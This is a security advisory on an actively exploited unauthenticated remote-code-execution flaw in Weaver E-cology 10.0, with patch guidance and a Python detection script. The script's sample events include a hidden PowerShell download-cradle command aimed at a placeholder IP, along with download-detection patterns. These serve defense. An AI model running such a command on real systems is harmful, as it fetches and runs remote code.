Critical Unauthenticated RCE in Weaver E‑cology (CVE‑2026‑22679) Exploited Since March
What It Is – A critical remote‑code‑execution (RCE) flaw (CVE‑2026‑22679) in Weaver E‑cology 10.0 allows unauthenticated attackers to invoke arbitrary system commands via an exposed debug API. The vulnerability was weaponised within weeks of the vendor’s patch release, before public disclosure.
Exploitability – Actively exploited in the wild from mid‑March 2026. Public PoC exists in the form of network traffic captured by Vega. CVSS v3.1 base score: 9.8 (Critical).
Affected Products – Weaver E‑cology 10.0 builds prior to 20260312 (the vendor’s March 12, 2026 security update). The platform is an enterprise office‑automation and collaboration suite used primarily by Chinese organizations for HR, document management, and workflow automation.
TPRM Impact – The flaw provides a direct path to execute commands on a third‑party’s server without any credentials, exposing downstream customers to data leakage, lateral movement, and potential supply‑chain compromise. Organizations that integrate Weaver E‑cology into their business processes face heightened risk of service disruption and inadvertent exposure of proprietary data.
Recommended Actions –
- Verify the exact version of Weaver E‑cology in use; if earlier than build 20260312, apply the vendor’s security update immediately.
- Conduct a forced‑upgrade audit across all subsidiaries and managed service providers that host the product.
- Review firewall and IDS/IPS logs for outbound connections to unknown PowerShell download URLs and for anomalous `whoami`, `ipconfig`, and `tasklist` commands originating from the Java/Tomcat process.
- Disable any non‑essential debug or API endpoints in the application configuration.
- Implement endpoint‑level monitoring for file‑less PowerShell activity and enforce strict application‑allow‑list policies.
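As an added example (not from the BleepingComputer article or from the vendor), the following Python scans constructed process‑creation events for the pattern the actions above describe: reconnaissance commands or PowerShell spawned by the E‑cology Java/Tomcat process. The event field names and the E‑cology install path are assumptions, not a real EDR schema.

```python
import re

# Constructed process-creation events for illustration (assumed field names,
# assumed install path C:\ecology; not a real Sysmon/EDR schema).
SAMPLE_EVENTS = [
    {"parent": r"C:\ecology\jdk\bin\java.exe", "image": r"C:\Windows\System32\whoami.exe",
     "cmdline": "whoami"},
    {"parent": r"C:\ecology\jdk\bin\java.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c ipconfig /all"},
    {"parent": r"C:\ecology\jdk\bin\java.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -nop -w hidden -c \"(New-Object Net.WebClient).DownloadString('http://198.51.100.7/x')\""},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c tasklist"},  # same command, but an interactive user, not the web app
    {"parent": r"C:\ecology\jdk\bin\java.exe", "image": r"C:\ecology\jdk\bin\java.exe",
     "cmdline": "java -jar worker.jar"},  # benign: Java spawning Java
]

RECON_COMMANDS = {"whoami", "ipconfig", "tasklist"}   # named in the advisory
SERVER_PARENTS = ("java.exe", "javaw.exe", "tomcat")  # E-cology runs under Java/Tomcat
DOWNLOAD_PATTERN = re.compile(r"downloadstring|downloadfile|invoke-webrequest|https?://|-enc")


def _basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def is_ecology_parent(parent):
    return any(p in _basename(parent) for p in SERVER_PARENTS)


def classify(event):
    """Return a reason string when the event matches the advisory's indicators, else None."""
    if not is_ecology_parent(event["parent"]):
        return None
    parent = _basename(event["parent"])
    cmd = event["cmdline"].lower()
    # Normalise tokens so both "whoami" and "C:\...\whoami.exe" match.
    words = {w[:-4] if w.endswith(".exe") else w for w in re.findall(r"[a-z0-9.\-]+", cmd)}
    recon = sorted(words & RECON_COMMANDS)
    if recon:
        return f"recon command {recon} spawned by {parent}"
    if _basename(event["image"]) in {"powershell.exe", "pwsh.exe"}:
        if DOWNLOAD_PATTERN.search(cmd):
            return f"powershell download/encoded command spawned by {parent}"
        return f"powershell spawned by {parent}"
    return None


def scan(events):
    """Return (index, reason) pairs for events that should be triaged."""
    return [(i, reason) for i, e in enumerate(events) if (reason := classify(e))]
```

Point `scan()` at real process-creation telemetry by mapping your EDR's parent/image/command-line fields onto the assumed keys; a match means the web application's service account launched the command, which the advisory treats as post-exploitation activity.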
Source: BleepingComputer – Weaver E‑cology critical bug exploited in attacks since March